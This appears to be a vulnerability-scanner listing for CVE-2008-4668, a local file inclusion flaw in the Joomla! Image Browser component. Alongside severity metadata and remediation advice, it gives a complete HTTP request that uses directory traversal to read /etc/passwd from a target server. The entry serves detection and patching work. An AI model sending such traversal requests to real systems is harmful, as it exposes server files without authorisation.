| Title | Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. |
| Remediation | Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. |
| CVSS Score | 9 |
| EPSS Score | 0.00144 |
| CVE ID | CVE-2008-4668 |
| CWE ID | CWE-22 |
| Tags | cve2008 cve joomla lfi edb vuln |
Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-4668.yaml
🦈 Packet Capture: ⬇️ Download cve-2008-4668.pcap
N/AN/A